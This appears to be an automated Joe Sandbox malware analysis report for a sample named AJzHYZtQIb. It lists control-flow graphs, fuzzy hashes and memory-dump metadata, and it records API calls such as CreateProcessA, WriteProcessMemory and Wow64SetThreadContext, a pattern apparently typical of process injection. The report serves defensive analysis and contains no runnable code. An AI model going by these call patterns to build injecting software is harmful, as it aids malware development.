
                        • Executed
                        • Not Executed
                        control_flow_graph 533 8d44328-8d44357 535 8d447b0-8d447d5 533->535 536 8d4435d-8d4435f 533->536 554 8d447dc-8d44844 535->554 537 8d44371 536->537 538 8d44361-8d4436f 536->538 539 8d44373-8d44375 537->539 538->539 541 8d44395-8d443ae 539->541 542 8d44377-8d44379 539->542 550 8d443b0-8d443bf 541->550 551 8d443c2-8d443c7 541->551 544 8d4438b 542->544 545 8d4437b-8d44389 542->545 548 8d4438d-8d4438f 544->548 545->548 548->541 549 8d44797-8d447ad 548->549 550->551 551->549 553 8d443cd-8d443d3 551->553 557 8d443d5-8d443d7 553->557 558 8d443e1-8d44416 553->558 697 8d4484a call 8d44ad0 554->697 698 8d4484a call 8d44ac1 554->698 557->558 563 8d444d2-8d444d6 558->563 564 8d444e0-8d444e6 563->564 565 8d444d8 563->565 567 8d444ec-8d44502 564->567 568 8d4441b-8d4441f 564->568 699 8d444da call 8d442c7 565->699 700 8d444da call 8d44328 565->700 569 8d44504-8d4450f 567->569 570 8d44515-8d4451a 567->570 572 8d44421 568->572 573 8d44429-8d4442f 568->573 569->570 574 8d445f8-8d445fc 570->574 572->573 575 8d44431-8d44436 573->575 576 8d4443e-8d44444 573->576 577 8d44606-8d4460f 574->577 578 8d445fe 574->578 575->576 576->554 580 8d4444a-8d44465 576->580 581 8d44615-8d44619 577->581 582 8d4451f-8d44523 577->582 578->577 589 8d44467-8d44469 580->589 590 8d44473-8d4447c 580->590 587 8d44693-8d44697 581->587 588 8d4461b-8d44642 581->588 584 8d44525 582->584 585 8d4452d-8d44536 582->585 584->585 591 8d44545-8d4454e 585->591 592 8d44538-8d4453d 585->592 593 8d4469d-8d446b1 587->593 594 8d4476a-8d44794 587->594 588->587 622 8d44644-8d44648 588->622 589->590 597 8d444d1 590->597 598 8d4447e-8d44482 590->598 591->554 596 8d44554-8d4456f 591->596 592->591 605 8d446b7 593->605 606 8d446b3-8d446b5 593->606 613 8d44571-8d44573 596->613 614 8d4457d-8d445b5 596->614 597->563 602 8d44484-8d44488 598->602 603 8d444ab-8d444c4 598->603 609 8d4448a-8d44495 602->609 610 8d4449b-8d444a9 602->610 619 8d444ca 603->619 604 8d44850-8d44ab8 611 8d446ba-8d446e1 605->611 606->611 609->610 610->619 635 8d446e3-8d446ee 611->635 636 8d4471c-8d44740 611->636 613->614 638 8d445f5 614->638 639 8d445b7-8d445bb 614->639 619->597 625 8d44674-8d4468d 622->625 626 8d4464a-8d44672 622->626 625->587 626->587 649 8d44706-8d4471a 635->649 650 8d446f0-8d446f6 635->650 652 8d44742 636->652 653 8d4474a-8d4474b 636->653 638->574 641 8d445cd-8d445e6 639->641 642 8d445bd-8d445cb 639->642 651 8d445ec-8d445f3 641->651 642->651 649->635 649->636 655 8d446f8 650->655 656 8d446fa-8d446fc 650->656 651->581 652->653 653->594 655->649 656->649 697->604 698->604 699->564 700->564
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID:
                        • String ID: (aq$LR]q$PH]q$$]q$$]q$$]q
                        • API String ID: 0-1937764415
                        • Opcode ID: aec89646800dc4621e966a0074ce2bde6e0f2363fab9c65eb3b82c086eb898b4
                        • Instruction ID: 4a8939cbef42282522dc3de31497a301c0ac810b715378fbbe6ce8eee5898ec0
                        • Opcode Fuzzy Hash: aec89646800dc4621e966a0074ce2bde6e0f2363fab9c65eb3b82c086eb898b4
                        • Instruction Fuzzy Hash: 16228F34714604CFDB04DFA4D4A9B6EBBB2FB88741F108218E9169B394CF76AD86CB54

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 701 8d48398-8d483c8 702 8d483ea-8d483ef 701->702 703 8d483ca-8d483cd 702->703 704 8d483d6-8d483e8 703->704 705 8d483cf 703->705 704->703 705->702 705->704 706 8d484b5-8d484ba 705->706 707 8d48436-8d48438 705->707 708 8d484f7-8d484fb 705->708 709 8d485d7-8d485dc 705->709 710 8d483f1 705->710 711 8d4863c-8d48645 705->711 712 8d484bf-8d484d5 705->712 713 8d48546-8d4854d 705->713 714 8d48406-8d4840b 705->714 715 8d48527-8d48531 705->715 716 8d485c0-8d485c4 705->716 717 8d48480-8d4848a 705->717 718 8d485e1-8d48607 705->718 719 8d48561-8d48566 705->719 720 8d48462-8d48469 705->720 721 8d4840d-8d48410 705->721 722 8d4856b-8d4856d 705->722 706->703 736 8d48456 707->736 737 8d4843a-8d48440 707->737 729 8d4851c 708->729 730 8d484fd-8d48506 708->730 709->703 731 8d483f4-8d483f6 710->731 732 8d48654 711->732 738 8d48647-8d4864f 711->738 712->731 757 8d484db-8d484e5 712->757 724 8d48659-8d48676 713->724 735 8d48553-8d4855c 713->735 714->703 715->724 734 8d48537-8d48541 715->734 726 8d485c6 716->726 727 8d485d0-8d485d5 716->727 717->724 725 8d48490-8d484a1 717->725 771 8d4860c-8d48616 718->771 772 8d48609 718->772 719->703 723 8d4846f-8d4847b 720->723 720->724 721->732 733 8d48416-8d48420 721->733 739 8d4856f-8d48575 722->739 740 8d4858b 722->740 723->703 725->724 743 8d484a7-8d484b0 725->743 744 8d485cb 726->744 727->744 751 8d4851f-8d48526 729->751 747 8d4850d-8d48510 730->747 748 8d48508-8d4850b 730->748 749 8d483ff-8d48404 731->749 750 8d483f8 731->750 732->724 733->724 752 8d48426-8d4842f 733->752 734->703 735->703 741 8d48458-8d48459 736->741 753 8d48446-8d48452 737->753 754 8d48442-8d48444 737->754 738->703 755 8d48577-8d48579 739->755 756 8d4857b-8d48587 739->756 742 8d4858d-8d485ac 740->742 778 8d4845c call 8d48810 741->778 779 8d4845c call 8d48803 741->779 742->724 770 8d485b2-8d485bb 742->770 743->703 744->703 758 8d4851a 747->758 748->758 759 8d483fd 749->759 750->759 760 8d48434 752->760 761 8d48431 752->761 762 8d48454 753->762 754->762 763 8d48589 755->763 756->763 757->724 767 8d484eb-8d484f2 757->767 758->751 759->703 760->703 761->760 762->741 763->742 767->703 770->703 773 8d4861c 771->773 774 8d48618-8d4861a 771->774 772->771 775 8d4861f-8d48631 773->775 774->775 775->724 777 8d48633-8d48637 775->777 777->703 778->720 779->720
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID:
                        • String ID: LR]q$LR]q$LR]q$LR]q$$]q$$]q
                        • API String ID: 0-2875722158
                        • Opcode ID: baf4c99bc6c9e83df0191fee828a08d9228717e0e8ec3d9c7ba5d9459ad22bc7
                        • Instruction ID: 34cf34fbc128eaca4235d46e09ca34201b7462ab461550c7d80888144bdb7c41
                        • Opcode Fuzzy Hash: baf4c99bc6c9e83df0191fee828a08d9228717e0e8ec3d9c7ba5d9459ad22bc7
                        • Instruction Fuzzy Hash: DF71D471A04154CFCB158FA9D4587BDBBF1AB483C2F04A67AE4A5EB281C734DC82EB51

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 910 7aa3f5c-7aa3f64 911 7aa3f66-7aa3ffd 910->911 912 7aa3f05-7aa3f22 910->912 918 7aa3fff-7aa4009 911->918 919 7aa4036-7aa4056 911->919 916 7aa3f2b-7aa3f50 912->916 917 7aa3f24-7aa3f2a 912->917 917->916 918->919 922 7aa400b-7aa400d 918->922 929 7aa4058-7aa4062 919->929 930 7aa408f-7aa40be 919->930 924 7aa400f-7aa4019 922->924 925 7aa4030-7aa4033 922->925 926 7aa401b 924->926 927 7aa401d-7aa402c 924->927 925->919 926->927 927->927 931 7aa402e 927->931 929->930 932 7aa4064-7aa4066 929->932 936 7aa40c0-7aa40ca 930->936 937 7aa40f7-7aa41b1 CreateProcessA 930->937 931->925 934 7aa4068-7aa4072 932->934 935 7aa4089-7aa408c 932->935 938 7aa4076-7aa4085 934->938 939 7aa4074 934->939 935->930 936->937 940 7aa40cc-7aa40ce 936->940 950 7aa41ba-7aa4240 937->950 951 7aa41b3-7aa41b9 937->951 938->938 941 7aa4087 938->941 939->938 942 7aa40d0-7aa40da 940->942 943 7aa40f1-7aa40f4 940->943 941->935 945 7aa40de-7aa40ed 942->945 946 7aa40dc 942->946 943->937 945->945 947 7aa40ef 945->947 946->945 947->943 961 7aa4242-7aa4246 950->961 962 7aa4250-7aa4254 950->962 951->950 961->962 963 7aa4248 961->963 964 7aa4256-7aa425a 962->964 965 7aa4264-7aa4268 962->965 963->962 964->965 966 7aa425c 964->966 967 7aa426a-7aa426e 965->967 968 7aa4278-7aa427c 965->968 966->965 967->968 969 7aa4270 967->969 970 7aa428e-7aa4295 968->970 971 7aa427e-7aa4284 968->971 969->968 972 7aa42ac 970->972 973 7aa4297-7aa42a6 970->973 971->970 975 7aa42ad 972->975 973->972 975->975
                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07AA419E
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2251500503.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_7aa0000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID: 0|?!$0|?!
                        • API String ID: 963392458-740985272
                        • Opcode ID: 84f5eb40fde8a1be57f7786f519568c2fa15d5837b3dee5c718997fcdcff77f7
                        • Instruction ID: f3f3fec002830f52ec52e58652689a198ccf1b95c564af6b6a4620d267c7639a
                        • Opcode Fuzzy Hash: 84f5eb40fde8a1be57f7786f519568c2fa15d5837b3dee5c718997fcdcff77f7
                        • Instruction Fuzzy Hash: 6CB18EB1D0065ADFDF20DFA9C8407EDBBB2BF49314F148569E818A7240DB749985CF92

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 976 7aa3f68-7aa3ffd 978 7aa3fff-7aa4009 976->978 979 7aa4036-7aa4056 976->979 978->979 980 7aa400b-7aa400d 978->980 986 7aa4058-7aa4062 979->986 987 7aa408f-7aa40be 979->987 982 7aa400f-7aa4019 980->982 983 7aa4030-7aa4033 980->983 984 7aa401b 982->984 985 7aa401d-7aa402c 982->985 983->979 984->985 985->985 988 7aa402e 985->988 986->987 989 7aa4064-7aa4066 986->989 993 7aa40c0-7aa40ca 987->993 994 7aa40f7-7aa41b1 CreateProcessA 987->994 988->983 991 7aa4068-7aa4072 989->991 992 7aa4089-7aa408c 989->992 995 7aa4076-7aa4085 991->995 996 7aa4074 991->996 992->987 993->994 997 7aa40cc-7aa40ce 993->997 1007 7aa41ba-7aa4240 994->1007 1008 7aa41b3-7aa41b9 994->1008 995->995 998 7aa4087 995->998 996->995 999 7aa40d0-7aa40da 997->999 1000 7aa40f1-7aa40f4 997->1000 998->992 1002 7aa40de-7aa40ed 999->1002 1003 7aa40dc 999->1003 1000->994 1002->1002 1004 7aa40ef 1002->1004 1003->1002 1004->1000 1018 7aa4242-7aa4246 1007->1018 1019 7aa4250-7aa4254 1007->1019 1008->1007 1018->1019 1020 7aa4248 1018->1020 1021 7aa4256-7aa425a 1019->1021 1022 7aa4264-7aa4268 1019->1022 1020->1019 1021->1022 1023 7aa425c 1021->1023 1024 7aa426a-7aa426e 1022->1024 1025 7aa4278-7aa427c 1022->1025 1023->1022 1024->1025 1026 7aa4270 1024->1026 1027 7aa428e-7aa4295 1025->1027 1028 7aa427e-7aa4284 1025->1028 1026->1025 1029 7aa42ac 1027->1029 1030 7aa4297-7aa42a6 1027->1030 1028->1027 1032 7aa42ad 1029->1032 1030->1029 1032->1032
                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07AA419E
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2251500503.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_7aa0000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID: 0|?!$0|?!
                        • API String ID: 963392458-740985272
                        • Opcode ID: 3a372d672c027efadc9ec484bdc19c40c208d7d701b8ed6a332898fe53f715ca
                        • Instruction ID: 583b0416f1bb0fb21b430338e67a2fb3cba0787493fd2d87e8c340562f739cb0
                        • Opcode Fuzzy Hash: 3a372d672c027efadc9ec484bdc19c40c208d7d701b8ed6a332898fe53f715ca
                        • Instruction Fuzzy Hash: 5B916EB1D0065ADFDF24CFA9C8407EDBBB2BF48314F148569E818A7240DBB59985CF92

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1033 54622a4-5462316 1034 5462321-5462328 1033->1034 1035 5462318-546231e 1033->1035 1036 5462333-54623d2 CreateWindowExW 1034->1036 1037 546232a-5462330 1034->1037 1035->1034 1039 54623d4-54623da 1036->1039 1040 54623db-5462413 1036->1040 1037->1036 1039->1040 1044 5462415-5462418 1040->1044 1045 5462420 1040->1045 1044->1045 1046 5462421 1045->1046 1046->1046
                        APIs
                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 054623C2
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2248378748.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_5460000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID: CreateWindow
                        • String ID: 0|?!$0|?!
                        • API String ID: 716092398-740985272
                        • Opcode ID: 19fb984092be4580b656384744c83f21f9f47d3b6eb9f21c8cd48a8d29fbb62f
                        • Instruction ID: b76f65c5d8d675d857d716dce3cbccd16d4b8912018d468989fe488c7326cc4b
                        • Opcode Fuzzy Hash: 19fb984092be4580b656384744c83f21f9f47d3b6eb9f21c8cd48a8d29fbb62f
                        • Instruction Fuzzy Hash: F951C2B5D04309EFDB14CFA9C984ADEBBB5BF48314F24812AE819AB210D7759885CF91

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1047 54622b0-5462316 1048 5462321-5462328 1047->1048 1049 5462318-546231e 1047->1049 1050 5462333-54623d2 CreateWindowExW 1048->1050 1051 546232a-5462330 1048->1051 1049->1048 1053 54623d4-54623da 1050->1053 1054 54623db-5462413 1050->1054 1051->1050 1053->1054 1058 5462415-5462418 1054->1058 1059 5462420 1054->1059 1058->1059 1060 5462421 1059->1060 1060->1060
                        APIs
                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 054623C2
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2248378748.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_5460000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID: CreateWindow
                        • String ID: 0|?!$0|?!
                        • API String ID: 716092398-740985272
                        • Opcode ID: 1ff8796bb0fa18731856a858800213e31a197b02abcc608f437f1a88b3ab73a4
                        • Instruction ID: 31875c8612a3dee63dd8cab0fee2d68b2f56b0e743ad40e75a28cbaf71dcd10a
                        • Opcode Fuzzy Hash: 1ff8796bb0fa18731856a858800213e31a197b02abcc608f437f1a88b3ab73a4
                        • Instruction Fuzzy Hash: F641C3B5D04309AFDB14CF99C884ADEBBB5BF48310F24812AE819AB210D7B59885CF91

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1272 8d442c7-8d442e1 1273 8d44327-8d44333 1272->1273 1274 8d442e3-8d442ef 1272->1274 1275 8d44335-8d44357 1273->1275 1274->1275 1276 8d442f1-8d44318 1274->1276 1283 8d447b0-8d447d5 1275->1283 1284 8d4435d-8d4435f 1275->1284 1277 8d44381-8d44389 1276->1277 1278 8d4431a-8d44324 1276->1278 1279 8d4438d-8d4438f 1277->1279 1278->1273 1281 8d44395-8d443ae 1279->1281 1282 8d44797-8d447ad 1279->1282 1291 8d443b0-8d443bf 1281->1291 1292 8d443c2-8d443c7 1281->1292 1303 8d447dc-8d44844 1283->1303 1285 8d44371 1284->1285 1286 8d44361-8d4436f 1284->1286 1288 8d44373-8d44375 1285->1288 1286->1288 1288->1281 1293 8d44377-8d44379 1288->1293 1291->1292 1292->1282 1294 8d443cd-8d443d3 1292->1294 1296 8d4438b 1293->1296 1297 8d4437b 1293->1297 1299 8d443d5-8d443d7 1294->1299 1300 8d443e1-8d44416 1294->1300 1296->1279 1297->1277 1299->1300 1305 8d444d2-8d444d6 1300->1305 1443 8d4484a call 8d44ad0 1303->1443 1444 8d4484a call 8d44ac1 1303->1444 1307 8d444e0-8d444e6 1305->1307 1308 8d444d8 1305->1308 1310 8d444ec-8d44502 1307->1310 1311 8d4441b-8d4441f 1307->1311 1441 8d444da call 8d442c7 1308->1441 1442 8d444da call 8d44328 1308->1442 1312 8d44504-8d4450f 1310->1312 1313 8d44515-8d4451a 1310->1313 1314 8d44421 1311->1314 1315 8d44429-8d4442f 1311->1315 1312->1313 1317 8d445f8-8d445fc 1313->1317 1314->1315 1318 8d44431-8d44436 1315->1318 1319 8d4443e-8d44444 1315->1319 1320 8d44606-8d4460f 1317->1320 1321 8d445fe 1317->1321 1318->1319 1319->1303 1322 8d4444a-8d44465 1319->1322 1324 8d44615-8d44619 1320->1324 1325 8d4451f-8d44523 1320->1325 1321->1320 1331 8d44467-8d44469 1322->1331 1332 8d44473-8d4447c 1322->1332 1329 8d44693-8d44697 1324->1329 1330 8d4461b-8d44642 1324->1330 1327 8d44525 1325->1327 1328 8d4452d-8d44536 1325->1328 1327->1328 1334 8d44545-8d4454e 1328->1334 1335 8d44538-8d4453d 1328->1335 1336 8d4469d-8d446b1 1329->1336 1337 8d4476a-8d44794 1329->1337 1330->1329 1365 8d44644-8d44648 1330->1365 1331->1332 1340 8d444d1 1332->1340 1341 8d4447e-8d44482 1332->1341 1334->1303 1339 8d44554-8d4456f 1334->1339 1335->1334 1347 8d446b7 1336->1347 1348 8d446b3-8d446b5 1336->1348 1355 8d44571-8d44573 1339->1355 1356 8d4457d-8d445b5 1339->1356 1340->1305 1344 8d44484-8d44488 1341->1344 1345 8d444ab-8d444c4 1341->1345 1351 8d4448a-8d44495 1344->1351 1352 8d4449b-8d444a9 1344->1352 1361 8d444ca 1345->1361 1353 8d446ba-8d446e1 1347->1353 1348->1353 1351->1352 1352->1361 1377 8d446e3-8d446ee 1353->1377 1378 8d4471c-8d44740 1353->1378 1355->1356 1380 8d445f5 1356->1380 1381 8d445b7-8d445bb 1356->1381 1361->1340 1362 8d44850-8d44ab8 1367 8d44674-8d4468d 1365->1367 1368 8d4464a-8d44672 1365->1368 1367->1329 1368->1329 1392 8d44706-8d4471a 1377->1392 1393 8d446f0-8d446f6 1377->1393 1395 8d44742 1378->1395 1396 8d4474a-8d4474b 1378->1396 1380->1317 1384 8d445cd-8d445e6 1381->1384 1385 8d445bd-8d445cb 1381->1385 1394 8d445ec-8d445f3 1384->1394 1385->1394 1392->1377 1392->1378 1397 8d446f8 1393->1397 1398 8d446fa-8d446fc 1393->1398 1394->1324 1395->1396 1396->1337 1397->1392 1398->1392 1441->1307 1442->1307 1443->1362 1444->1362
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID:
                        • String ID: LR]q$PH]q$$]q$$]q
                        • API String ID: 0-3307124116
                        • Opcode ID: b26ef213fc1639fff0b88a6d3160ea8339c7e3f2ccc4eb54b3e82e5b47534134
                        • Instruction ID: a00895bc5a289d9386ee9052241fdcf4406c09f3ee2660c56b8582d888df26e9
                        • Opcode Fuzzy Hash: b26ef213fc1639fff0b88a6d3160ea8339c7e3f2ccc4eb54b3e82e5b47534134
                        • Instruction Fuzzy Hash: 6481EF31A02245CFCB14CFA8C994BADBBF2BF89741F249269D406DB394DB34D886CB54
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2251573419.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_8d40000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID:
                        • String ID: LR]q$LR]q$$]q
                        • API String ID: 0-2603884067
                        • Opcode ID: 5fa6ed5f6041f98b4ec1ca43c54132dbe672477d7c54785f72be7a9d904e2fb4
                        • Instruction ID: d3fcf720ee1e1480cca01992abfd5d2e2982dd2134453729eab7555c1d271681
                        • Opcode Fuzzy Hash: 5fa6ed5f6041f98b4ec1ca43c54132dbe672477d7c54785f72be7a9d904e2fb4
                        • Instruction Fuzzy Hash: AB61C572A04154CFD7118FA8D4547BDBBF1AB483C3F08A77AE0A5E7291C334D886AB11
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 02D6B7BE
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2245008665.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_2d60000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID: 0|?!
                        • API String ID: 4139908857-2553515243
                        • Opcode ID: 8d218c5508c9d0a0289f169d310ce360e3d763dbbe7a0d1ab1db5b5134183214
                        • Instruction ID: 37add8a7e3e9805838b3936db9985c8a11a5dee528c4e254f53757d63eb184bb
                        • Opcode Fuzzy Hash: 8d218c5508c9d0a0289f169d310ce360e3d763dbbe7a0d1ab1db5b5134183214
                        • Instruction Fuzzy Hash: 8C813670A00B458FD724DF69D1547AABBF5FF88308F00892AD486EBB50DB74E949CB90
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 02D65DB9
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2245008665.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_2d60000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID: Create
                        • String ID: 0|?!
                        • API String ID: 2289755597-2553515243
                        • Opcode ID: b4dc124dbadf76d118f3e31ff07a17c3d1d7525dcf750f4e83464cfbfc07343f
                        • Instruction ID: d30d3fe12b9d3c3265abf14bf06b4a903e0d2f06e9fb88434be34782a2bbfa67
                        • Opcode Fuzzy Hash: b4dc124dbadf76d118f3e31ff07a17c3d1d7525dcf750f4e83464cfbfc07343f
                        • Instruction Fuzzy Hash: BE41E3B1C00719CBDB24DFA9C888B9DBBB5BF48304F60806AD409AB355DB756986CF91
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 02D65DB9
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2245008665.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_2d60000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID: Create
                        • String ID: 0|?!
                        • API String ID: 2289755597-2553515243
                        • Opcode ID: 7591468786c69cf4bcdf58fe6702ddbc816ebdb3c8c3cd0c34859420f9ada761
                        • Instruction ID: 46a2a12608319dfff4b4d0f143d06b0b81f59a902d8df414d674b224f67b5a3c
                        • Opcode Fuzzy Hash: 7591468786c69cf4bcdf58fe6702ddbc816ebdb3c8c3cd0c34859420f9ada761
                        • Instruction Fuzzy Hash: E941D2B1C00619CFDB24CFA9C888BDDBBF6BF48304F64846AD408AB255DB755986CF91
                        APIs
                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 05464AC1
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2248378748.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_5460000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID: CallProcWindow
                        • String ID: 0|?!
                        • API String ID: 2714655100-2553515243
                        • Opcode ID: a3c1f8d96db291aae8f27793bc28907bac7be3b0f2fafab8399acda2b53b6fc5
                        • Instruction ID: 3bb25bd749361b4d913df5835f48db620ccfcd45391ec8914c959d288e6b5ac6
                        • Opcode Fuzzy Hash: a3c1f8d96db291aae8f27793bc28907bac7be3b0f2fafab8399acda2b53b6fc5
                        • Instruction Fuzzy Hash: 094118B89003059FCB14CF99C489BAABBF6FF88314F24C499D519AB321D375A841CFA5
                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07AA3D70
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2251500503.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_7aa0000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID: 0|?!
                        • API String ID: 3559483778-2553515243
                        • Opcode ID: ab05156c554022336830db5249851def4debcc379693e6c87fce38ee04a224fd
                        • Instruction ID: 549ad7df7010b2322961cd88900b81956779f79c0e379905e6b4c135f42543bd
                        • Opcode Fuzzy Hash: ab05156c554022336830db5249851def4debcc379693e6c87fce38ee04a224fd
                        • Instruction Fuzzy Hash: 522135B1900349DFCB10DFAAC881BEEBBF5FF49310F108829E959A7240C7789944CBA0
                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07AA3D70
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2251500503.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_7aa0000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID: 0|?!
                        • API String ID: 3559483778-2553515243
                        • Opcode ID: eb847878fd67ded3b3fbe19d17706bc7412206e7447ae34c085b8f026aae2f5a
                        • Instruction ID: 36592f25f98c821bbe6f33dae8dc56a5a89d951a0ea7d6ce2fa1f870cb1f41e0
                        • Opcode Fuzzy Hash: eb847878fd67ded3b3fbe19d17706bc7412206e7447ae34c085b8f026aae2f5a
                        • Instruction Fuzzy Hash: 4E21F6B59003599FCF10DFAAC885BEEBBF5FF48310F508829E919A7250C7789945CBA0
                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07AA3BC6
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2251500503.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_7aa0000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID: 0|?!
                        • API String ID: 983334009-2553515243
                        • Opcode ID: eb44108c57a2e02ece964e9bd6636f243af6645905aded9d325921b3e6b55aa7
                        • Instruction ID: 3fe85d667b74ddccdce0238d10c8f77dd71b5c0a371152824f34279eedbe96cf
                        • Opcode Fuzzy Hash: eb44108c57a2e02ece964e9bd6636f243af6645905aded9d325921b3e6b55aa7
                        • Instruction Fuzzy Hash: C92148B19003099FDB10DFAAC4847AEBBF5EF89310F14842AD459A7240CB789985CBA0
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02D6DE16,?,?,?,?,?), ref: 02D6DED7
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2245008665.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_2d60000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID: 0|?!
                        • API String ID: 3793708945-2553515243
                        • Opcode ID: bc80c9c4ff67d641f0571f1d8762406efeec7ce6e0ac630ce517e66bfaf025fe
                        • Instruction ID: 72303989bb9340630e10d5ed8ae72e2f3da6a1610760b8f3aca04e0fae6eba83
                        • Opcode Fuzzy Hash: bc80c9c4ff67d641f0571f1d8762406efeec7ce6e0ac630ce517e66bfaf025fe
                        • Instruction Fuzzy Hash: 0521E5B59002089FDB10CF9AD984AEEBBF5EB48310F14845AE958A3311D378A944CFA4
                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07AA3E50
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2251500503.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_7aa0000_AJzHYZtQIb.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID: 0|?!
                        • API String ID: 1726664587-2553515243
                        • Opcode ID: 5ab4515605753d4238e329af153f34bb5e0e8eac3ed291f463fad748211a30aa
                        • Instruction ID: 316f1ad7e52f8d708bad92b6215cae0977e05757c64dbfe3e2949c2ba314aa8a
                        • Opcode Fuzzy Hash: 5ab4515605753d4238e329af153f34bb5e0e8eac3ed291f463fad748211a30aa
